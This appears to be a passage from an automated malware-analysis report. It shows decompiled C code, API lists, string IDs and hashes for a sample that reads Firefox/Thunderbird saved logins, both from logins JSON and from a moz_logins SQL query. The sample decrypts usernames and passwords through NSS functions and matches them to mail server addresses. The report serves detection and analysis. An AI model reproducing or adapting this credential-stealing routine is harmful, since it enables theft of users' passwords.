				if(_t93 != _t175) {
					L36:
					return E0040E6B4(_t221);
				} else {
					E00411C05(_t209, _t221, _t235, E00411BDA(_t235), _a8);
					E00411EB7(_t207,  &_v164, _t235);
					_t208 = E00411CB0( &_v164, "logins");
					_t236 = _t208 - _t175;
					if(_t208 == _t175) {
						L33:
						_t101 =  *((intOrPtr*)(_v20 + 8));
						if(_t101 != _t175) {
							 *_t101();
						}
						E00404638( &_v108);
						E00406B8A( &_v132);
						E00406A7D( &_v164);
						_t221 = _v20;
						goto L36;
					}
					E00411BDA(_t236);
					_t109 = E00406B3E( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 + 8)));
					_t237 = _t109 - _t175;
					if(_t109 == _t175) {
						_t109 = 0x41344f;
					}
					_v40 = _t175;
					E00406CFF( &_v60, _t109);
					while(E00411EB7(_t208,  &_v92, _t237) != 0) {
						_v8668 = _t175;
						memset( &_v8667, _t175, 0x3ff);
						memset( &_v7644, _t175, 0x1400);
						_t231 = _t230 + 0x18;
						_t212 =  &_v92;
						_t225 = E00411C8A( &_v92, "hostname");
						_v16 = E00411C8A( &_v92, "encryptedUsername");
						_a8 = E00411C8A( &_v92, "encryptedPassword");
						_v12 = E00411C8A( &_v92, "usernameField");
						_v8 = E00411C8A(_t212, "passwordField");
						_t122 = E00411C8A(_t212, "httpRealm");
						__eflags = _t225 - _t175;
						_t213 = _t122;
						if(_t225 != _t175) {
							strcpy( &_v8668, _t225);
						}
						__eflags = _v16 - _t175;
						if(_v16 != _t175) {
							strcpy( &_v7644, _v16);
						}
						__eflags = _a8 - _t175;
						if(_a8 != _t175) {
							strcpy( &_v6620, _a8);
						}
						__eflags = _v12 - _t175;
						if(_v12 != _t175) {
							strcpy( &_v5596, _v12);
						}
						__eflags = _v8 - _t175;
						if(_v8 != _t175) {
							strcpy( &_v4572, _v8);
						}
						__eflags = _t213 - _t175;
						if(_t213 != _t175) {
							strcpy( &_v3548, _t213);
						}
						_v676 = _t175;
						memset( &_v675, _t175, 0xff);
						_v420 = _t175;
						memset( &_v419, _t175, 0xff);
						_t215 = _a4;
						_t230 = _t231 + 0x18;
						E0040CF02(_a8, _t215,  &_v420);
						E0040CF02(_v16, _t215,  &_v676);
						__eflags =  *((intOrPtr*)(_t215 + 0x474)) - _t175;
						_a8 = _t175;
						if(__eflags > 0) {
							_t216 = _t215 + 0x468;
							__eflags = _t216;
							_v8 = _t216;
							do {
								_t229 = E0040DA96(_a8, _v8);
								_v1292 = _t175;
								memset( &_v1291, _t175, 0x261);
								_v2524 = _t175;
								memset( &_v2523, _t175, 0x261);
								_v1908 = _t175;
								memset( &_v1907, _t175, 0x261);
								_t56 = _t229 + 0x104; // 0x104
								_t218 = _t56;
								sprintf( &_v1292, "mailbox://%s", _t218);
								sprintf( &_v2524, "imap://%s", _t218);
								sprintf( &_v1908, "smtp://%s", _t218);
								_t230 = _t230 + 0x48;
								_push( &_v3548);
								_t148 =  &_v1292;
								_push(_t148);
								L00412072();
								__eflags = _t148;
								if(_t148 == 0) {
									L26:
									_t66 = _t229 + 0x204; // 0x204
									_t149 = _t66;
									_push(_t149);
									_v12 = _t149;
									_t150 =  &_v676;
									_push(_t150);
									L00412072();
									__eflags = _t150;
									if(_t150 == 0) {
										__eflags = _v420 - _t175;
										if(_v420 != _t175) {
											_t71 = _t229 + 0x304; // 0x304
											E004060DA(0xff, _t71,  &_v420);
										}
										E004060DA(0xff, _v12,  &_v676);
										_t175 = 0;
										__eflags = 0;
									}
									goto L30;
								}
								_push( &_v3548);
								_t157 =  &_v2524;
								_push(_t157);
								L00412072();
								__eflags = _t157;
								if(_t157 == 0) {
									goto L26;
								}
								_push( &_v3548);
								_t159 =  &_v1908;
								_push(_t159);
								L00412072();
								__eflags = _t159;
								if(_t159 != 0) {
									goto L30;
								}
								goto L26;
								L30:
								_a8 =  &(_a8[1]);
								__eflags = _a8 -  *((intOrPtr*)(_a4 + 0x474));
							} while (__eflags < 0);
						}
					}
					E00404638( &_v36);
					E00406B8A( &_v60);
					E00406A7D( &_v92);
					goto L33;
				}
			}


























































                                                                                                                                                                  0x0040d003
                                                                                                                                                                  0x0040d00b
                                                                                                                                                                  0x0040d013
                                                                                                                                                                  0x0040d01c
                                                                                                                                                                  0x0040d020
                                                                                                                                                                  0x0040d023
                                                                                                                                                                  0x0040d02a
                                                                                                                                                                  0x0040d3b2
                                                                                                                                                                  0x0040d3b2
                                                                                                                                                                  0x0040d030
                                                                                                                                                                  0x0040d033
                                                                                                                                                                  0x0040d037
                                                                                                                                                                  0x0040d045
                                                                                                                                                                  0x0040d045
                                                                                                                                                                  0x0040d039
                                                                                                                                                                  0x0040d040
                                                                                                                                                                  0x0040d042
                                                                                                                                                                  0x0040d048
                                                                                                                                                                  0x0040d04a
                                                                                                                                                                  0x0040d3a9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d050
                                                                                                                                                                  0x0040d05f
                                                                                                                                                                  0x0040d06a
                                                                                                                                                                  0x0040d079
                                                                                                                                                                  0x0040d07b
                                                                                                                                                                  0x0040d07d
                                                                                                                                                                  0x0040d37f
                                                                                                                                                                  0x0040d382
                                                                                                                                                                  0x0040d387
                                                                                                                                                                  0x0040d389
                                                                                                                                                                  0x0040d389
                                                                                                                                                                  0x0040d38e
                                                                                                                                                                  0x0040d396
                                                                                                                                                                  0x0040d3a1
                                                                                                                                                                  0x0040d3a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d3a6
                                                                                                                                                                  0x0040d086
                                                                                                                                                                  0x0040d091
                                                                                                                                                                  0x0040d096
                                                                                                                                                                  0x0040d098
                                                                                                                                                                  0x0040d09a
                                                                                                                                                                  0x0040d09a
                                                                                                                                                                  0x0040d0a4
                                                                                                                                                                  0x0040d0a7
                                                                                                                                                                  0x0040d358
                                                                                                                                                                  0x0040d0be
                                                                                                                                                                  0x0040d0c4
                                                                                                                                                                  0x0040d0d6
                                                                                                                                                                  0x0040d0db
                                                                                                                                                                  0x0040d0e3
                                                                                                                                                                  0x0040d0f0
                                                                                                                                                                  0x0040d0fc
                                                                                                                                                                  0x0040d109
                                                                                                                                                                  0x0040d116
                                                                                                                                                                  0x0040d123
                                                                                                                                                                  0x0040d126
                                                                                                                                                                  0x0040d12b
                                                                                                                                                                  0x0040d12d
                                                                                                                                                                  0x0040d12f
                                                                                                                                                                  0x0040d139
                                                                                                                                                                  0x0040d13f
                                                                                                                                                                  0x0040d140
                                                                                                                                                                  0x0040d143
                                                                                                                                                                  0x0040d14f
                                                                                                                                                                  0x0040d155
                                                                                                                                                                  0x0040d156
                                                                                                                                                                  0x0040d159
                                                                                                                                                                  0x0040d165
                                                                                                                                                                  0x0040d16b
                                                                                                                                                                  0x0040d16c
                                                                                                                                                                  0x0040d16f
                                                                                                                                                                  0x0040d17b
                                                                                                                                                                  0x0040d181
                                                                                                                                                                  0x0040d182
                                                                                                                                                                  0x0040d185
                                                                                                                                                                  0x0040d191
                                                                                                                                                                  0x0040d197
                                                                                                                                                                  0x0040d198
                                                                                                                                                                  0x0040d19a
                                                                                                                                                                  0x0040d1a4
                                                                                                                                                                  0x0040d1aa
                                                                                                                                                                  0x0040d1b9
                                                                                                                                                                  0x0040d1bf
                                                                                                                                                                  0x0040d1cd
                                                                                                                                                                  0x0040d1d3
                                                                                                                                                                  0x0040d1d8
                                                                                                                                                                  0x0040d1db
                                                                                                                                                                  0x0040d1ea
                                                                                                                                                                  0x0040d1fb
                                                                                                                                                                  0x0040d200
                                                                                                                                                                  0x0040d206
                                                                                                                                                                  0x0040d209
                                                                                                                                                                  0x0040d20f
                                                                                                                                                                  0x0040d20f
                                                                                                                                                                  0x0040d215
                                                                                                                                                                  0x0040d218
                                                                                                                                                                  0x0040d229
                                                                                                                                                                  0x0040d233
                                                                                                                                                                  0x0040d239
                                                                                                                                                                  0x0040d247
                                                                                                                                                                  0x0040d24d
                                                                                                                                                                  0x0040d25b
                                                                                                                                                                  0x0040d261
                                                                                                                                                                  0x0040d266
                                                                                                                                                                  0x0040d266
                                                                                                                                                                  0x0040d279
                                                                                                                                                                  0x0040d28b
                                                                                                                                                                  0x0040d29d
                                                                                                                                                                  0x0040d2a2
                                                                                                                                                                  0x0040d2ab
                                                                                                                                                                  0x0040d2ac
                                                                                                                                                                  0x0040d2b2
                                                                                                                                                                  0x0040d2b3
                                                                                                                                                                  0x0040d2b8
                                                                                                                                                                  0x0040d2bc
                                                                                                                                                                  0x0040d2f0
                                                                                                                                                                  0x0040d2f0
                                                                                                                                                                  0x0040d2f0
                                                                                                                                                                  0x0040d2f6
                                                                                                                                                                  0x0040d2f7
                                                                                                                                                                  0x0040d2fa
                                                                                                                                                                  0x0040d300
                                                                                                                                                                  0x0040d301
                                                                                                                                                                  0x0040d306
                                                                                                                                                                  0x0040d30a
                                                                                                                                                                  0x0040d30c
                                                                                                                                                                  0x0040d312
                                                                                                                                                                  0x0040d31b
                                                                                                                                                                  0x0040d326
                                                                                                                                                                  0x0040d32b
                                                                                                                                                                  0x0040d33b
                                                                                                                                                                  0x0040d341
                                                                                                                                                                  0x0040d341
                                                                                                                                                                  0x0040d341
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d30a
                                                                                                                                                                  0x0040d2c4
                                                                                                                                                                  0x0040d2c5
                                                                                                                                                                  0x0040d2cb
                                                                                                                                                                  0x0040d2cc
                                                                                                                                                                  0x0040d2d1
                                                                                                                                                                  0x0040d2d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d2dd
                                                                                                                                                                  0x0040d2de
                                                                                                                                                                  0x0040d2e4
                                                                                                                                                                  0x0040d2e5
                                                                                                                                                                  0x0040d2ea
                                                                                                                                                                  0x0040d2ee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d343
                                                                                                                                                                  0x0040d343
                                                                                                                                                                  0x0040d34c
                                                                                                                                                                  0x0040d34c
                                                                                                                                                                  0x0040d218
                                                                                                                                                                  0x0040d209
                                                                                                                                                                  0x0040d36b
                                                                                                                                                                  0x0040d373
                                                                                                                                                                  0x0040d37a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d37a

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                                                                                                                                                                    • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                                                                                                                                                                    • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                                                                                                                                                                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                                                                                                                                                                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                                                                                                                                                                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                                                                                                                                                                    • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                                                                                                                                                                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                                                                                                                                                                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                                                                                                                                                                  • memset.MSVCRT ref: 0040D0C4
                                                                                                                                                                  • memset.MSVCRT ref: 0040D0D6
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D139
                                                                                                                                                                  • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D14F
                                                                                                                                                                  • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D165
                                                                                                                                                                  • strcpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D17B
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D191
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D1A4
                                                                                                                                                                  • memset.MSVCRT ref: 0040D1BF
                                                                                                                                                                  • memset.MSVCRT ref: 0040D1D3
                                                                                                                                                                  • memset.MSVCRT ref: 0040D239
                                                                                                                                                                  • memset.MSVCRT ref: 0040D24D
                                                                                                                                                                  • memset.MSVCRT ref: 0040D261
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D279
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D28B
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D29D
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D2B3
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D2CC
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D2E5
                                                                                                                                                                  • _stricmp.MSVCRT(?,00000204), ref: 0040D301
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$CurrentDirectoryLibraryLoadstrlen$HandleModule
                                                                                                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                  • API String ID: 1176642800-3943159138
                                                                                                                                                                  • Opcode ID: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                                                                                                                                                                  • Instruction ID: cce80d09e33f880f425c5e7640b59ca7d1e8d6c5df6cdb4a6b0c5a683426509d
                                                                                                                                                                  • Opcode Fuzzy Hash: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                                                                                                                                                                  • Instruction Fuzzy Hash: CDA15372D00119AEDB20EBA5CD819DE77BCAF44308F1405ABF608F7141DA3CAA85CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D3B5, Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 339stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E0040D3B5(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				intOrPtr _v28;
				int _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				void _v3227;
				char _v3228;
				char _v4252;
				char _v5276;
				char _v6300;
				char _v7324;
				char _v8348;
				void _v9371;
				char _v9372;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t115;
				void* _t116;
				signed int _t117;
				signed int _t118;
				intOrPtr* _t122;
				void* _t133;
				char* _t179;
				int* _t180;
				char* _t187;
				char* _t189;
				int _t208;
				char* _t246;
				void* _t247;
				intOrPtr _t250;
				char* _t254;
				intOrPtr _t256;
				void* _t258;
				void* _t260;
				void* _t261;
				void* _t262;

				E00412360(0x249c, __ecx);
				_t115 = _a4;
				_t245 = _t115 + 0x362;
				_t250 = _t115 + 0x30;
				_v28 = _t250;
				_t116 = E0040E54C(_t250, _t115 + 0x362);
				if(_t116 == 0) {
					return _t116;
				}
				_t117 =  *(_t250 + 4);
				_t208 = 0;
				if(_t117 == 0) {
					_t118 = _t117 | 0xffffffff;
				} else {
					_t118 =  *_t117(_a4 + 0x158);
				}
				if(_t118 != _t208) {
					L43:
					return E0040E6B4(_v28);
				} else {
					_v32 = _t208;
					if(E0040FCBC( &_v68, _t245) == 0) {
						L41:
						_t122 =  *((intOrPtr*)(_v28 + 8));
						if(_t122 != _t208) {
							 *_t122();
						}
						goto L43;
					} else {
						_v12 = _t208;
						_v1380 = _t208;
						memset( &_v1378, _t208, 0x208);
						_v852 = _t208;
						memset( &_v851, _t208, 0x104);
						_t261 = _t260 + 0x18;
						MultiByteToWideChar(_t208, _t208, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t208,  &_v1380, 0xffffffff,  &_v852, 0x104, _t208, _t208);
						if(_v68 != _t208) {
							_v68( &_v852,  &_v12);
						}
						if(_v12 != _t208) {
							_a8 = _t208;
							if(_v64 != _t208) {
								_v64(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v72);
								_t261 = _t261 + 0x14;
							}
							L11:
							L11:
							if(_v60 == _t208) {
								_t133 = 0xffff;
							} else {
								_t133 = _v60(_a8);
							}
							if(_t133 != 0x64) {
								goto L36;
							}
							_v9372 = _t208;
							memset( &_v9371, _t208, 0x3ff);
							memset( &_v8348, _t208, 0x1400);
							_t262 = _t261 + 0x18;
							_t254 = E0040FE97( &_v68, _a8, 1);
							_t246 = E0040FE97( &_v68, _a8, 6);
							_v8 = E0040FE97( &_v68, _a8, 7);
							_v20 = E0040FE97( &_v68, _a8, 4);
							_v24 = E0040FE97( &_v68, _a8, 5);
							_v16 = E0040FE97( &_v68, _a8, 2);
							if(_t254 != _t208) {
								strcpy( &_v9372, _t254);
							}
							if(_t246 != _t208) {
								strcpy( &_v8348, _t246);
							}
							if(_v8 != _t208) {
								strcpy( &_v7324, _v8);
							}
							if(_v20 != _t208) {
								strcpy( &_v6300, _v20);
							}
							if(_v24 != _t208) {
								strcpy( &_v5276, _v24);
							}
							if(_v16 != _t208) {
								strcpy( &_v4252, _v16);
							}
							_v332 = _t208;
							memset( &_v331, _t208, 0xff);
							_v588 = _t208;
							memset( &_v587, _t208, 0xff);
							_t256 = _a4;
							_t261 = _t262 + 0x18;
							E0040CF02(_v8, _t256,  &_v588);
							E0040CF02(_t246, _t256,  &_v332);
							_v8 = _t208;
							if( *((intOrPtr*)(_t256 + 0x474)) > _t208) {
								_v16 = _t256 + 0x468;
								do {
									_t247 = E0040DA96(_v8, _v16);
									_v3228 = _t208;
									memset( &_v3227, _t208, 0x261);
									_v1996 = _t208;
									memset( &_v1995, _t208, 0x261);
									_v2612 = _t208;
									memset( &_v2611, _t208, 0x261);
									_t84 = _t247 + 0x104; // 0x104
									_t258 = _t84;
									sprintf( &_v3228, "mailbox://%s", _t258);
									sprintf( &_v1996, "imap://%s", _t258);
									sprintf( &_v2612, "smtp://%s", _t258);
									_t261 = _t261 + 0x48;
									_push( &_v4252);
									_t179 =  &_v3228;
									_push(_t179);
									L00412072();
									if(_t179 == 0) {
										L32:
										_t94 = _t247 + 0x204; // 0x204
										_t259 = _t94;
										_t180 =  &_v332;
										_push(_t94);
										_push(_t180);
										L00412072();
										if(_t180 == 0) {
											E004060DA(0xff, _t247 + 0x304,  &_v588);
											E004060DA(0xff, _t259,  &_v332);
											_t208 = 0;
										}
										goto L34;
									}
									_push( &_v4252);
									_t187 =  &_v1996;
									_push(_t187);
									L00412072();
									if(_t187 == 0) {
										goto L32;
									}
									_push( &_v4252);
									_t189 =  &_v2612;
									_push(_t189);
									L00412072();
									if(_t189 != 0) {
										goto L34;
									}
									goto L32;
									L34:
									_v8 =  &(_v8[1]);
								} while (_v8 <  *((intOrPtr*)(_a4 + 0x474)));
							}
							goto L11;
							L36:
							if(_a8 != _t208 && _v44 != _t208) {
								_v44(_a8);
							}
							if(_v40 != _t208) {
								_v40(_v12);
							}
						}
						goto L41;
					}
				}
			}




























































                                                                                                                                                                  0x0040d3bd
                                                                                                                                                                  0x0040d3c2
                                                                                                                                                                  0x0040d3c8
                                                                                                                                                                  0x0040d3ce
                                                                                                                                                                  0x0040d3d2
                                                                                                                                                                  0x0040d3d5
                                                                                                                                                                  0x0040d3dc
                                                                                                                                                                  0x0040d7be
                                                                                                                                                                  0x0040d7be
                                                                                                                                                                  0x0040d3e2
                                                                                                                                                                  0x0040d3e5
                                                                                                                                                                  0x0040d3e9
                                                                                                                                                                  0x0040d3fa
                                                                                                                                                                  0x0040d3eb
                                                                                                                                                                  0x0040d3f5
                                                                                                                                                                  0x0040d3f7
                                                                                                                                                                  0x0040d3ff
                                                                                                                                                                  0x0040d7b2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d405
                                                                                                                                                                  0x0040d409
                                                                                                                                                                  0x0040d413
                                                                                                                                                                  0x0040d7a6
                                                                                                                                                                  0x0040d7a9
                                                                                                                                                                  0x0040d7ae
                                                                                                                                                                  0x0040d7b0
                                                                                                                                                                  0x0040d7b0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d419
                                                                                                                                                                  0x0040d426
                                                                                                                                                                  0x0040d429
                                                                                                                                                                  0x0040d430
                                                                                                                                                                  0x0040d443
                                                                                                                                                                  0x0040d449
                                                                                                                                                                  0x0040d44e
                                                                                                                                                                  0x0040d460
                                                                                                                                                                  0x0040d47f
                                                                                                                                                                  0x0040d488
                                                                                                                                                                  0x0040d495
                                                                                                                                                                  0x0040d499
                                                                                                                                                                  0x0040d49d
                                                                                                                                                                  0x0040d4a6
                                                                                                                                                                  0x0040d4a9
                                                                                                                                                                  0x0040d4bd
                                                                                                                                                                  0x0040d4c0
                                                                                                                                                                  0x0040d4c0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d4c3
                                                                                                                                                                  0x0040d4c6
                                                                                                                                                                  0x0040d4d1
                                                                                                                                                                  0x0040d4c8
                                                                                                                                                                  0x0040d4cb
                                                                                                                                                                  0x0040d4ce
                                                                                                                                                                  0x0040d4d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d4ec
                                                                                                                                                                  0x0040d4f2
                                                                                                                                                                  0x0040d504
                                                                                                                                                                  0x0040d509
                                                                                                                                                                  0x0040d51e
                                                                                                                                                                  0x0040d52d
                                                                                                                                                                  0x0040d53c
                                                                                                                                                                  0x0040d54c
                                                                                                                                                                  0x0040d55c
                                                                                                                                                                  0x0040d569
                                                                                                                                                                  0x0040d56c
                                                                                                                                                                  0x0040d576
                                                                                                                                                                  0x0040d57c
                                                                                                                                                                  0x0040d57f
                                                                                                                                                                  0x0040d589
                                                                                                                                                                  0x0040d58f
                                                                                                                                                                  0x0040d593
                                                                                                                                                                  0x0040d59f
                                                                                                                                                                  0x0040d5a5
                                                                                                                                                                  0x0040d5a9
                                                                                                                                                                  0x0040d5b5
                                                                                                                                                                  0x0040d5bb
                                                                                                                                                                  0x0040d5bf
                                                                                                                                                                  0x0040d5cb
                                                                                                                                                                  0x0040d5d1
                                                                                                                                                                  0x0040d5d5
                                                                                                                                                                  0x0040d5e1
                                                                                                                                                                  0x0040d5e7
                                                                                                                                                                  0x0040d5f6
                                                                                                                                                                  0x0040d5fc
                                                                                                                                                                  0x0040d60a
                                                                                                                                                                  0x0040d610
                                                                                                                                                                  0x0040d615
                                                                                                                                                                  0x0040d618
                                                                                                                                                                  0x0040d627
                                                                                                                                                                  0x0040d637
                                                                                                                                                                  0x0040d642
                                                                                                                                                                  0x0040d645
                                                                                                                                                                  0x0040d652
                                                                                                                                                                  0x0040d655
                                                                                                                                                                  0x0040d666
                                                                                                                                                                  0x0040d670
                                                                                                                                                                  0x0040d676
                                                                                                                                                                  0x0040d684
                                                                                                                                                                  0x0040d68a
                                                                                                                                                                  0x0040d698
                                                                                                                                                                  0x0040d69e
                                                                                                                                                                  0x0040d6a3
                                                                                                                                                                  0x0040d6a3
                                                                                                                                                                  0x0040d6b6
                                                                                                                                                                  0x0040d6c8
                                                                                                                                                                  0x0040d6da
                                                                                                                                                                  0x0040d6df
                                                                                                                                                                  0x0040d6e8
                                                                                                                                                                  0x0040d6e9
                                                                                                                                                                  0x0040d6ef
                                                                                                                                                                  0x0040d6f0
                                                                                                                                                                  0x0040d6f9
                                                                                                                                                                  0x0040d72d
                                                                                                                                                                  0x0040d72d
                                                                                                                                                                  0x0040d72d
                                                                                                                                                                  0x0040d733
                                                                                                                                                                  0x0040d739
                                                                                                                                                                  0x0040d73a
                                                                                                                                                                  0x0040d73b
                                                                                                                                                                  0x0040d744
                                                                                                                                                                  0x0040d758
                                                                                                                                                                  0x0040d766
                                                                                                                                                                  0x0040d76d
                                                                                                                                                                  0x0040d76d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d744
                                                                                                                                                                  0x0040d701
                                                                                                                                                                  0x0040d702
                                                                                                                                                                  0x0040d708
                                                                                                                                                                  0x0040d709
                                                                                                                                                                  0x0040d712
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d71a
                                                                                                                                                                  0x0040d71b
                                                                                                                                                                  0x0040d721
                                                                                                                                                                  0x0040d722
                                                                                                                                                                  0x0040d72b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d76f
                                                                                                                                                                  0x0040d76f
                                                                                                                                                                  0x0040d778
                                                                                                                                                                  0x0040d784
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d789
                                                                                                                                                                  0x0040d78c
                                                                                                                                                                  0x0040d796
                                                                                                                                                                  0x0040d799
                                                                                                                                                                  0x0040d79d
                                                                                                                                                                  0x0040d7a2
                                                                                                                                                                  0x0040d7a5
                                                                                                                                                                  0x0040d79d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d49d
                                                                                                                                                                  0x0040d413

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                                                                                                                                                                    • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                                                                                                                                                                    • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                                                                                                                                                                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                                                                                                                                                                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                                                                                                                                                                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                                                                                                                                                                    • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                                                                                                                                                                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                                                                                                                                                                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                                                                                                                                                                  • memset.MSVCRT ref: 0040D430
                                                                                                                                                                  • memset.MSVCRT ref: 0040D449
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D954,000000FF,?,00000104,00000104,00000000,?,0040D954,?,00000000), ref: 0040D460
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D954,?,00000000), ref: 0040D47F
                                                                                                                                                                  • memset.MSVCRT ref: 0040D4F2
                                                                                                                                                                  • memset.MSVCRT ref: 0040D504
